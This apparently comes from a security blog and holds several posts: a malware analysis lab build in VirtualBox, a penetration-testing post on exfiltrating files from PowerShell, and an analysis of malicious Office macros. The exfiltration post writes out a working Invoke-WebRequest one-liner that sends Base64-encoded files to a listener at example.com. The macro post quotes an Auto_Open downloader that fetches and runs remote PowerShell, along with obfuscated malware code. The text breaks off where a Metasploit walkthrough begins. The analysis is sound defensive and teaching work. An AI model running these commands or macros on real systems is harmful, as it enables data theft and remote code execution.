Based on this static analysis, which allows for the comparison of two packing tools, it becomes evident that the UPX packer provides several indicators that make detecting a packed binary relatively easy. These indicators are not necessarily easy to obfuscate. On the other hand, ASPack presents a somewhat simpler situation by adding only two sections that could potentially be renamed in an attempt to avoid detection. It's important to note that this analysis didn't include all aspects of the header that can reveal the packed nature of binaries. However, having the original binary for comparison greatly aids in understanding the changes that occur, although this may not always be the case when dealing with samples found in the wild.

In an upcoming post, I will explore the process of extracting unpacked data through dynamic analysis using a debugger. Dynamic analysis is a powerful technique that allows observation of how a packed binary behaves when executed, providing insights into its inner workings and uncovering potential security threats. Debugging tools enable stepping through the code, analyzing memory structures, and gaining a deeper understanding of the program's runtime behavior.

As this discussion on packing techniques and analysis concludes, it becomes evident that understanding the intricacies of packing is essential for both cybersecurity professionals and malware analysts. Whether detecting the telltale signs of packing or dynamically analyzing a binary, these skills are invaluable in the ever-evolving landscape of cybersecurity.

Malware Analysis Lab Build

Tue, 05 Jul 2022 03:39:05 +0000

Learning the craft of malware analysis requires a lab that allows malicious binaries and files to be safely analyzed and executed. This lab often involves multiple virtual machines that are able to interact with each other but not with any other computers on the network where the host OS resides or with the Internet. This means that it is necessary to create an isolated network that only those virtual machines can reach.

VirtualBox is one of the most commonly used hypervisors since it's free and runs on the most popular operating systems. It also has the features to configure the network that the virtual machines can use and to take snapshots of the virtual machine state.

In this post, the creation of the lab that uses VirtualBox and an isolated network is detailed. For the network configuration, the Internal Network is used and a DHCP server is configured in VirtualBox to hand out the IP addresses to the hosts; this is where this lab varies from other setups that I've seen.

Windows Host

Most malware is created for the Windows OS, which means that it is necessary to create a virtual machine that runs this OS and has the necessary tools for analyzing the malware.

The Windows 10 ISO can be downloaded from the Microsoft Evaluation Center; the Windows 11 ISO is also available on the same site. For the lab setup detailed here, a Windows 10 VM is going to be used; however, it is also possible to use Windows 11.

The virtual machine is created with the Name of FlareVM; this can be anything and doesn't affect the rest of the lab build. Then set the Type to Microsoft Windows and the Version to Windows 10 (64-bit). The amount of memory to reserve for the virtual machine will vary depending on the available memory of the host system; setting this to 4 GB (4096 MB) is generally a good amount to work with. The Hard disk size can be set to a minimum of 60 GB, though I usually set this to 100 GB.

After the virtual machine is created, I make some additional changes to the configuration prior to starting the machine for the first time:

In the System section, EFI is enabled, though this isn't required since the legacy BIOS can also be used.

In the Processor tab, these settings will depend on the available resources of the host system. I set the processor count to 2 and also enable the PAE/NX and the Nested VT-x/AMD-V.

For the Display section, increase the Video Memory to 128 MB, which is the highest available when not enabling the 3D Acceleration. I also leave the 3D Acceleration disabled as I've found that it tends to generate display issues in Windows 10.

All other options can be left in their default configuration. The virtual machine can now be started and Windows 10 installed as normal. During the installation process, disconnect the network cable from the virtual machine by right-clicking the network icon at the bottom of the virtual machine window and unchecking the Connect network adapter option. This prevents Windows from attempting to install updates and from requiring a Microsoft account to create the user account.

After the Windows 10 OS has been installed, power off the system and create a snapshot of the virtual machine to have a restore point that can be used if necessary. The snapshot can be created with the following steps:

Click on the Tools menu button that is found on the right side of the virtual machine entry in the VirtualBox main window
Select the Snapshots option from the menu
Click on the Take button from the toolbar, a window is displayed where a name can be given to the snapshot and a description

Start the Windows 10 virtual machine again and follow the steps mentioned in the Flare-VM repository to install the tools that will be used for malware analysis within the Windows 10 virtual machine. This process requires a connection to the Internet, so be sure to enable the network connectivity.

REMnux

The other virtual machine that is created runs REMnux, a GNU/Linux distribution that contains several tools for malware analysis and reverse engineering.

The virtual appliance can be downloaded from the REMnux Documentation, which provides a VirtualBox OVA file with the virtual machine already set up.

While the virtual machine can be used as is, I recommend reviewing the settings and increasing the Processor, Memory, and Display resources depending on the available resources of the host system.

Isolated Network Setup

Once the virtual machines have been installed and are ready to be isolated, the Internal Network can be created in VirtualBox. Setting up the DHCP Server that will be used can only be done through the CLI by using the VBoxManage command.

The first command creates the DHCP Server:

VBoxManage dhcpserver add --network malwarelab --ip 10.0.0.1 --netmask 255.255.255.0 --lowerip 10.0.0.10 --upperip 10.0.0.100

Breaking down the command to detail each of the options that are specified:

--network specifies the name that the network receives and that is used to reference the network when configuring the virtual machines or the network
--ip specifies the IP address that the DHCP server itself uses; it can be set to either the first or last address in the subnet range, and no virtual machine can use this address
--netmask sets the network mask that is used for the subnet; even though only two virtual machines are created, other machines can be added later to analyze more complex samples or certain behavior, so a /24 mask that leaves room for growth is fine
--lowerip specifies the start of the range of IP addresses that can be assigned to the hosts that make a DHCP request
--upperip specifies the end of the range of IP addresses available for assignment; the range is inclusive, so in this sample command there are 91 IP addresses in the pool, which should be enough
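The size of the pool and the placement of the static addresses can be double-checked before running VBoxManage. The sketch below uses only the Python standard library; the function names are illustrative and are not part of VirtualBox.

```python
import ipaddress


def dhcp_pool_size(lower: str, upper: str) -> int:
    """Return the number of addresses in an inclusive DHCP range."""
    low = ipaddress.IPv4Address(lower)
    high = ipaddress.IPv4Address(upper)
    if high < low:
        raise ValueError("upper address must not be below lower address")
    return int(high) - int(low) + 1


def in_subnet(address: str, server_ip: str, netmask: str) -> bool:
    """Check that an address belongs to the subnet served by the DHCP server."""
    network = ipaddress.IPv4Network(f"{server_ip}/{netmask}", strict=False)
    return ipaddress.IPv4Address(address) in network


# Values taken from the VBoxManage command above
print(dhcp_pool_size("10.0.0.10", "10.0.0.100"))
print(in_subnet("10.0.0.2", "10.0.0.1", "255.255.255.0"))
```

The second call checks that 10.0.0.2, the address later reserved for the REMnux host, is inside the subnet while sitting outside of the dynamic range.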

At this point the initial configuration is created, however, there are a couple of DHCP options that need to be set in order to use the REMnux virtual machine to capture any outbound requests that are made from the Windows 10 virtual machine. The command below sets the DNS and Default Gateway parameters so that the Windows 10 host sends any requests to the REMnux host

VBoxManage dhcpserver modify --netname malwarelab --set-opt=3 '10.0.0.2' --set-opt=5 '10.0.0.2' --set-opt=6 '10.0.0.2'

The --set-opt option specifies the DHCP option that is being set. Several options exist; the ones set in the command above are

3 Default Gateway
5 Name Server
6 Domain Name Servers

Option 6 is the one that sets the DNS server; option 5 is also set to make sure that any requests to resolve a host or domain name are sent to the REMnux host.

These options are not dynamic, meaning that the REMnux virtual machine should have the IP address that is specified in the above command set via a static lease. This is configured with the command below

VBoxManage dhcpserver modify --network malwarelab --mac-address 08002780A107 --fixed-address '10.0.0.2'

The --mac-address option specifies the MAC address of the network interface that receives the fixed address; the value is obtained from the Network configuration for the virtual machine in VirtualBox.

Make sure to check that the MAC address matches the one on the interface from the output of ip a, since some systems may set a random value that differs from the one set in VirtualBox

At this point, the DHCP Server can be enabled so that it can be used by the virtual machines. This is done with the command below

VBoxManage dhcpserver modify --netname malwarelab --enable

The configuration can be verified by running the command below, which lists all of the DHCP servers that are configured in VirtualBox

VBoxManage list dhcpservers

The final step is to set the Network configuration in each of the virtual machines that are part of the lab. After shutting down the virtual machines, go to the Network section in the Settings, set the Attached to field to Internal Network, and select malwarelab from the Name dropdown.

Once the virtual machines are started, verify that the IP addresses are assigned accordingly and that they are able to contact each other.

Keep in mind that the Internal Network that is created has no access to any other network, and only the virtual machines in this malwarelab network can reach each other. This means that the virtual machines are completely isolated.

Data Exfiltration - Uploading from PowerShell

Thu, 11 Nov 2021 16:28:49 +0000

During a penetration testing engagement it may be necessary to extract files from a target host. Many tools exist for this job, but there may be instances where interaction with the host is only possible through a reverse shell, which limits the available options.

This post goes over one method that can be used, which leverages the Invoke-WebRequest cmdlet to send Base64 encoded data in the body of an HTTP POST request.

On the host that receives the data, start a netcat listener that pipes the received data to a file. This can be achieved with the following command

ncat -lvnp 8000 | tee data.b64

Piping the output of netcat to the tee command makes it easy to watch the data that is being sent from the target host. Since the data is Base64 encoded, it won't mess up the terminal and it is easy to see when the transfer has finished. Once the data transfer is complete, close the connection by pressing Ctrl+C on the terminal that is running the netcat listener.

On the target host, the file can be Base64 encoded with the following .NET expression

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Path\to\file"))

The output can be stored in a variable, as shown below

$B64DATA = [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Path\to\file"))

The command that is used to send the data is shown below

Invoke-WebRequest -Uri http://example.com:8000/data.raw -Method POST -Body $B64DATA

The expression can also be passed directly to the Invoke-WebRequest cmdlet by wrapping it in parentheses, as can be seen in the following one-liner

Invoke-WebRequest -Uri http://example.com:8000/data.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Path\to\file")))

After the data is sent, the command will appear to be stuck because the listener never sends an HTTP response; closing the netcat listener terminates the session and returns the prompt on the reverse shell.

The data.b64 file that is written on the receiving host contains the full HTTP POST request. The Base64 encoded string is a single line at the end of the request, so it can be easily decoded with the following command

tail -1 data.b64 | base64 -d > data.bin

The file data.bin can then be used or processed as needed. Though the steps above detail the process for handling binary data, these steps can be used with plain text files as well without any issues.
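As an alternative to tail and base64, the captured request can be split on the blank line that separates the HTTP headers from the body. This is a minimal sketch that assumes the capture holds a single, non-chunked POST request; the function name is illustrative.

```python
import base64


def extract_body(raw_request: bytes) -> bytes:
    """Return the Base64-decoded body of a captured HTTP POST request."""
    # Headers and body are separated by an empty line (CRLF CRLF)
    _headers, separator, body = raw_request.partition(b"\r\n\r\n")
    if not separator:
        raise ValueError("no blank line separating headers from body")
    return base64.b64decode(body.strip())


# Small self-contained demonstration with a hand-written request
sample = (
    b"POST /data.raw HTTP/1.1\r\n"
    b"Host: example.com:8000\r\n"
    b"Content-Length: 8\r\n"
    b"\r\n"
    b"aGVsbG8="
)
print(extract_body(sample))
```

For a real capture, the bytes read from data.b64 would be passed to extract_body and the result written to data.bin.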

Analyzing Malware Documents

Mon, 18 Oct 2021 13:03:04 +0000

Being able to include code within a file allows certain tasks to be carried out when handling documents, whether that is to enhance the content or to process data within the document. However, this feature has been abused by malicious actors for a long time, and little can be done to mitigate this attack vector without removing the functionality from the document.

Microsoft has included the ability to embed Visual Basic for Applications code within Office documents since 1993, with the first version being implemented in Excel, allowing users to record actions to automate working with documents.

Visual Basic for Applications, or VBA, is based on Visual Basic 6, which is Microsoft's event-driven programming language that was discontinued back in 2008. However, the language lives on in VBA, where it facilitates automating tasks within Office documents, and in the closely related VBScript.

Office Document Structure

In the early 2000s, Microsoft began moving from a single binary file with a closed format to an open standard that uses XML files to make up the document. It became the default format in Office 2007.

Officially called Office Open XML and differentiated by an x at the end of the extension, the file itself is made up mainly of XML files that are contained in a zip archive. Besides XML files, any other files that are inserted into the document are also included within the zip archive.

Within the zip archive there are files that exist regardless of the type of document, the Metadata files, and files that depend on the type of document, the Document files, which are stored in a directory named after the document type.

The contents of the archive may differ depending on the program that created the file.

Metadata Files

There are 3 kinds of files in this group

Content Types: This XML file specifies the content type for each extension of the files that are included within the archive. The file is named [Content_Types].xml
Relationships: The files that end in .rels act as a type of index, telling the program where to locate the files that are related to the different parts that make up the document. The top-level file is located at _rels/.rels and contains the details for the primary files within the document.
References to Resources: Each component, for example the main document part of a Word document, can have its own .rels file inside a _rels directory (such as word/_rels/document.xml.rels) that points to other files related to that specific resource, for example an entry for an image file that is shown in one of the pages of the Word document.

Document Properties

Located in the docProps directory, these two XML files contain the properties of the document

app.xml: This file contains several file properties that relate to the application, including metrics data and program versions
core.xml: This file contains document data such as Title, author, timestamps, among other properties. Some properties may be user modifiable and others are controlled by the program.

Main Document Contents

The document contents are included in this directory and the directory name depends on the program that creates the file

word: Word Documents
ppt: PowerPoint Presentations
xl: Excel Spreadsheets

The contents of this directory will vary between the format types, however, they mainly include any styling data and the distribution of the document contents.

Macros may also be included within this directory or they may exist in a separate Macros directory.

Media

This directory includes any media, such as images, that are inserted into the document.

Malware in Macros

Malware is often embedded within Office documents and uses enticing names and messages to get users to open the documents and ignore any alerts.

Early versions of Office would automatically execute any macros that were included, which made it easier for malicious actors, as they only needed the victim to open the file. Due to this, Microsoft changed the way macros work: user intervention is now required to start the execution of a macro, and the user is alerted to the risk of running macros in unknown files.

Because of this change, malicious actors need to resort to creative measures to have the victim ignore the alert and run the macro code. Corporate environments may use macros within their documents without always considering employee education or signing the documents to avoid alerts. This results in users being conditioned to ignore the alerts, which makes it easier for malicious actors.

There are multiple ways that macros can be abused to attack the victim's system. In some cases the malware is within the code itself, or the macro may carry an encoded binary file that is then decoded, saved to disk, and executed.

Recent cases use the Office document as a first stage, where PowerShell code is leveraged to download a second stage that contains the actual malware. Due to the detection mechanisms in current security tools, malicious actors need to encode payloads and commands with different methods, which include simple encoding algorithms such as Base64, reversing strings, or otherwise obfuscating the strings within the code.

A simple example for a first stage using macros is shown in How to create Microsoft Office macro malware – phishing attack

Sub Auto_Open()
  Dim exec As String
  exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://192.168.1.104/tar.txt'))"""
  Shell (exec)
End Sub

In this example, the attack is simple and is not obfuscated; the code downloads a file from a web server and executes it using PowerShell. The downloaded PowerShell script could act as a second stage or even establish a reverse shell; the possibilities are endless.

During an investigation, it would be necessary to download any additional files that the macro retrieves in order to build the complete picture and look for indicators of compromise. These can be used to look for other systems that may have been infected or to establish monitoring rules that look out for new victims.

Parts of the malware can be placed within the metadata of the document, which serves as an easy hiding spot and can be quickly changed without having to go into the code to alter the payload.

Entry Point

For macro code, there are several functions that can act as an entry point for the execution, depending on the intention or obfuscation method that the malicious actor chooses. It is common for security applications to open email attachments for quick analysis, so in order to avoid the malware being triggered from the start, the malicious actor can use a different function that triggers the malware execution at a different point or under certain conditions.

Below is a sample of obfuscated code that serves as the entry point for the malware, where the function DecodeDocument is used

Attribute VB_Name = "NewMacros"                                                   
Sub DecodeDocument()                                                                                                                                                 
Attribute DecodeDocument.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.DecodeDocument"
'                   
' DecodeDocument Macro        
'                                                                                 
'                  
    Dim d3h5dHh5U3BwaWxX
    ODppd2VGaGloc2dpSA = ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))
    a3JtdnhXZ212aXF5UmVsdHBF = aWhzZ2lI("3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE")                                
    d2hyZXFxc0doaWhzZ2lI = QmFzZTY0X0RlY29kZQo(ODppd2VGaGloc2dpSA, a3JtdnhXZ212aXF5UmVsdHBF)
    eHxpWHJtZXBU = aWhzZ2lI(d2hyZXFxc0doaWhzZ2lI)                                 
    d3h5dHh5U3BwaWxX = Shell(eHxpWHJtZXBU, vbHide)                                
End Sub
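The Chr() chain that is passed to BuiltInDocumentProperties can be resolved without running the macro. The Python sketch below (the function name is illustrative and not part of the sample) extracts the character codes with a regular expression and joins them into the property name that the macro reads.

```python
import re


def decode_chr_chain(expression: str) -> str:
    """Resolve a VBA expression made of Chr(n) calls joined with + or &."""
    codes = re.findall(r"Chr\((\d+)\)", expression)
    return "".join(chr(int(code)) for code in codes)


# Expression copied from the DecodeDocument macro above
expr = (
    "Chr(67) + Chr(111) + Chr(109) + Chr(109) + "
    "Chr(101) + Chr(110) + Chr(116) + Chr(115)"
)
print(decode_chr_chain(expr))  # prints "Comments"
```

The macro therefore reads the Comments property of the document, which is where the encoded payload is stored.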

Base64 Decode Function

VBA does not include a built-in function or library that can quickly encode or decode Base64; however, it can be easily implemented using other components available to Office, such as MSXML. An example is shown with the following code

Private Function EncodeBase64(ByRef arrData() As Byte) As String

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
   
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
   
    ' byte array to base64
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text

 

    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Private Function DecodeBase64(ByVal strData As String) As Byte()

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
   
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
   
    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Malicious actors may sometimes create their own implementation of certain functionality within the malware. This can be done for various reasons: there may be no simpler way to do it within the language, or the goal may be to obfuscate the code. It is also common for only decoders to be included within the macro, especially in cases where the macro code doesn't need to encode any data.

Below is an obfuscated Base64 decoder that is found in a sample malware

Function QmFzZTY0X0RlY29kZQo(GYDozL, xbZuLutP)
    Dim VAIXQ,vgDKwiF,cWBqjCKwBl,CBnhtvROBWJf,VdNmpUUu,uOatMJ,GkdMVutOqmk,fqcaXNK,StBHym,NDXnaxDDQ,iXQiRtcgmWEUplc

    CBnhtvROBWJf = 2      
    VAIXQ = bGVuZ3RoCg(GYDozL)
    VdNmpUUu = 8
    uOatMJ = 16 * 4

    For cWBqjCKwBl = 1 To VAIXQ Step 4
        Dim zIlis,OaRRODd,WuFeJHdca,MmrJRSmq,EgnwkcNgcIgofn,dzYTBeK,xuRJndLZwLYPC,URJApvGRUMy,lpIcVNAjHiIgkw,ONOzKt,SdwnMSAxfcsNR

        zIlis = 3
        EgnwkcNgcIgofn = 0

        For OaRRODd = 0 To 3
            WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)

            If WuFeJHdca = "=" Then
                zIlis = zIlis - 1
                MmrJRSmq = 0
            Else
                MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
            End If

            EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
        Next

        EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
        EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn

        dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))

        vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
    Next

    QmFzZTY0X0RlY29kZQo = vgDKwiF
End Function

The function accepts two parameters:

GYDozL = Base64 encoded string
xbZuLutP = Base64 alphabet string "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
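To follow the logic of the obfuscated decoder, the same steps can be written with readable names. The following Python sketch mirrors the VBA loop (groups of four characters, an index lookup in the alphabet, and one byte dropped per = sign); the names are illustrative, and padding unpadded input with = is an assumption added here that is not in the VBA code.

```python
STANDARD_ALPHABET = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
)


def decode_with_alphabet(encoded: str, alphabet: str = STANDARD_ALPHABET) -> bytes:
    """Decode Base64 text using an explicit 64-character alphabet."""
    # Assumption: pad to a multiple of 4 so truncated input still decodes
    encoded += "=" * (-len(encoded) % 4)
    out = bytearray()
    for start in range(0, len(encoded), 4):
        keep = 3      # bytes to keep from this group
        value = 0     # 24-bit accumulator for four 6-bit values
        for char in encoded[start:start + 4]:
            if char == "=":
                keep -= 1
                index = 0
            else:
                # Raises ValueError if the character is not in the alphabet
                index = alphabet.index(char)
            value = value * 64 + index
        out += value.to_bytes(3, "big")[:keep]
    return bytes(out)


print(decode_with_alphabet("aGVsbG8="))
```

Passing the alphabet as a parameter is what allows the malware to hide the alphabet string behind another layer of encoding.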

There are also variables that are used as decoys, meaning that their values are never used after being assigned. The same can be done with functions: multiple functions can be created but never called, or functions can be called but their output never used.

Encoding is not used with security in mind. It is used to make commands harder to detect, to convert between encodings, or to avoid losing parts of the data when transferring it over the Internet.

For this next sample code, the byte value of each character is decreased by 4, a fixed shift in the style of ROT13, and then the whole string is reversed.

Function aWhzZ2lI(a3JtdnhXaGloc2dySQ)
    Dim b As String, i As Long, a() As Byte, sh
    a = StrConv(a3JtdnhXaGloc2dySQ, vbFromUnicode)
    For i = 0 To UBound(a)
        a(i) = a(i) - 4
    Next i
    b = StrReverse(StrConv(a, vbUnicode))
    aWhzZ2lI = b
End Function

There is only one input parameter, which is the string that is encoded.
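The same transformation can be reproduced outside of Office to recover the hidden strings. This is a minimal Python sketch with an illustrative function name; it assumes the input only contains single-byte characters, which is the case for the string literal taken from the DecodeDocument macro.

```python
def shift_and_reverse(encoded: str, shift: int = 4) -> str:
    """Subtract a fixed value from every byte, then reverse the string."""
    # latin-1 maps each character to one byte, similar to vbFromUnicode
    shifted = bytes(b - shift for b in encoded.encode("latin-1"))
    return shifted.decode("latin-1")[::-1]


# String literal passed to aWhzZ2lI in the DecodeDocument macro
OBFUSCATED = r"3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE"
print(shift_and_reverse(OBFUSCATED))
```

The result is the standard Base64 alphabet, which the macro then hands to its Base64 decoder as the second parameter.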

One way to analyze a function is to look at what parameters it is called with and what output it returns. It is still important to look for any calls that may execute commands outside of the code or Office document.

Renaming Functions

Given that VBA doesn't offer a way to rename or alias functions the way languages like JavaScript do, a workaround is to create a wrapper function that simply returns the value that the other function returns.

In this example, to obfuscate the function Len, a wrapper function is created with a random-looking string of characters as its name.

Function bGVuZ3RoCg(c3RyaW5nCg)
    bGVuZ3RoCg = Len(c3RyaW5nCg)
End Function
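The function names in this sample are not entirely random: they appear to be Base64 strings with the padding removed. The Python sketch below restores the padding and decodes a few of them; the helper name is illustrative, and treating the identifiers as Base64 is an observation about this sample rather than a general rule.

```python
import base64


def decode_identifier(name: str) -> str:
    """Decode an identifier that looks like unpadded Base64."""
    padded = name + "=" * (-len(name) % 4)
    return base64.b64decode(padded).decode("ascii", errors="replace").strip()


# Function names taken from the sample macros shown in this post
for name in ("QmFzZTY0X0RlY29kZQo", "bGVuZ3RoCg", "aWhzZ2lI"):
    print(name, "->", decode_identifier(name))
```

The first two names decode to Base64_Decode and length, which matches what those functions do. The third decodes to ihsgiH, which becomes Decode once each byte is decreased by 4 and the string is reversed, the same transformation that function applies to its input.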

Document Analysis

This section shows a quick analysis of a Word document. Microsoft Office documents that have a macro embedded receive an extension that ends with the letter m, though this can be changed.

The first step is to check the contents of the archive; the 7-zip utility can be used for this task

❯ 7z l Doc5.docm

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 26568 bytes (26 KiB)

Listing archive: Doc5.docm

--
Path = Doc5.docm
Type = zip
Physical Size = 26568

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00 .....         1585          413  [Content_Types].xml
1980-01-01 00:00:00 .....          590          239  _rels/.rels
1980-01-01 00:00:00 .....         4526         1557  word/document.xml
1980-01-01 00:00:00 .....         1081          301  word/_rels/document.xml.rels
1980-01-01 00:00:00 .....        27648        10834  word/vbaProject.bin
1980-01-01 00:00:00 .....         8393         1746  word/theme/theme1.xml
1980-01-01 00:00:00 .....          277          191  word/_rels/vbaProject.bin.rels
1980-01-01 00:00:00 .....         2474          609  word/vbaData.xml
1980-01-01 00:00:00 .....         3194         1105  word/settings.xml
1980-01-01 00:00:00 .....          241          155  customXml/item1.xml
1980-01-01 00:00:00 .....          341          225  customXml/itemProps1.xml
1980-01-01 00:00:00 .....        29364         2924  word/styles.xml
1980-01-01 00:00:00 .....          803          313  word/webSettings.xml
1980-01-01 00:00:00 .....         1567          502  word/fontTable.xml
1980-01-01 00:00:00 .....          991          572  docProps/core.xml
1980-01-01 00:00:00 .....         1041          524  docProps/app.xml
1980-01-01 00:00:00 .....          296          194  customXml/_rels/item1.xml.rels
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00              84412        22404  17 files

The presence of word/vbaProject.bin, along with its vbaProject.bin.rels file, confirms that there is a macro project within the document. This could be a red flag if there is no expectation of a macro being embedded within the document. Further analysis should be carried out in order to determine if the code is malicious or not.
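The same check can be scripted when several documents need to be triaged. The sketch below uses the zipfile module from the Python standard library; the function name is illustrative, and it only reports whether a VBA project part exists, not whether the code is malicious.

```python
import zipfile


def find_vba_parts(document) -> list:
    """Return the archive members that hold a VBA project.

    `document` can be a path or a file-like object opened in binary mode.
    """
    with zipfile.ZipFile(document) as archive:
        return [
            name for name in archive.namelist()
            if name.lower().endswith("vbaproject.bin")
        ]
```

Calling find_vba_parts("Doc5.docm") on the sample from the listing above would be expected to return word/vbaProject.bin, since that entry appears in the 7-zip output.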

Extracting Macro Source Code

There are tools that are able to extract source code from the document, such as oledump, which is used here to analyze the document.

❯ oledump Doc5.docm
A: word/vbaProject.bin
 A1:       412 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    7836 'VBA/NewMacros'
 A4: m    1135 'VBA/ThisDocument'
 A5:      5028 'VBA/_VBA_PROJECT'
 A6:      3195 'VBA/__SRP_0'
 A7:       340 'VBA/__SRP_1'
 A8:      3399 'VBA/__SRP_2'
 A9:       366 'VBA/__SRP_3'
A10:       348 'VBA/__SRP_4'
A11:       106 'VBA/__SRP_5'
A12:       571 'VBA/dir'

The output above shows multiple objects, each identified by the A code at the start of the line, which can be easily extracted with the following command

oledump Doc5.docm -v -s A3

This outputs the object A3, which holds the source code of the macro contained within the document; this is also indicated by the capital M in the first output.

Not all macros execute upon loading the document in an Office program, which can be done to avoid automatic analysis with sandbox tools. Documents that do execute code upon opening would use the autoopen function; the following code is an example of this case

Sub autoopen()
  MsgBox ("hello world")
End Sub

After the code is extracted, it should be analyzed to determine what is useful and what can be safely discarded. Look for places where the code carries out potentially dangerous commands and check whether they can be safely replaced with output to a message box or terminal, instead of executing other commands.

Tool olevba

Another tool to extract the source code is olevba; below is the sample document being analyzed with this tool

❯ olevba Doc5.docm
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Doc5.docm
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[..SOURCE CODE..]
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|vbHide              |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|StrReverse          |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
+----------+--------------------+---------------------------------------------+

An advantage of this tool is that it highlights keywords that are often used in malicious macro code, which can be an initial step in determining whether the macro might be malicious and a starting point on what to check.

Extracting Metadata

In newer Office documents, the metadata is stored in a file called core.xml, which can be viewed with the xmllint command

xmllint --format core.xml

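The output is formatted and can be easily read

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>JXZzaiRrc[..SNIP..]SR3bWxY</dc:title>
  <dc:subject/>
  <dc:creator>Document Author</dc:creator>
  <cp:keywords>WW91J3JlIGluIHR[..SNIP..]XJkZXIh</cp:keywords>
  <dc:description>gWpoNDZoPTZqNzlpPTE5O2l[..SNIP..]HBpbHd2aXtzdA</dc:description>
  <cp:lastModifiedBy>Document Author</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-16T00:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T00:55:00Z</dcterms:modified>
</cp:coreProperties>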

There are a couple of encoded strings visible, and the macro makes reference to the metadata. Having encoded strings in the metadata can also be a red flag, since they often contain other data that the macro needs, such as the URL or IP address from which to download another stage. Decoding them can provide more details, though it is possible that multiple encodings are used.
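Spotting encoded strings in the metadata can also be automated. The sketch below parses core.xml with the Python standard library and reports properties whose value is a long run of Base64 characters; the function name and the minimum length of 24 characters are arbitrary assumptions chosen for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: 24 or more Base64 characters in a row is worth a closer look
BASE64_RUN = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")


def suspicious_properties(core_xml) -> dict:
    """Map property names to values that look like Base64 data."""
    root = ET.fromstring(core_xml)
    findings = {}
    for element in root.iter():
        text = (element.text or "").strip()
        if BASE64_RUN.match(text):
            # Drop the "{namespace}" prefix that ElementTree adds to tags
            local_name = element.tag.rsplit("}", 1)[-1]
            findings[local_name] = text
    return findings
```

A match only means that the value resembles Base64; it still has to be decoded and reviewed to find out what it contains.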

Metasploit Reverse Shell

This is a reverse shell macro that was created using Metasploit. It is a good beginner sample that can be used to practice analysis of malware documents, and this section is a walkthrough of how to check this document.

Checking the file first with oledump shows the following output

A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
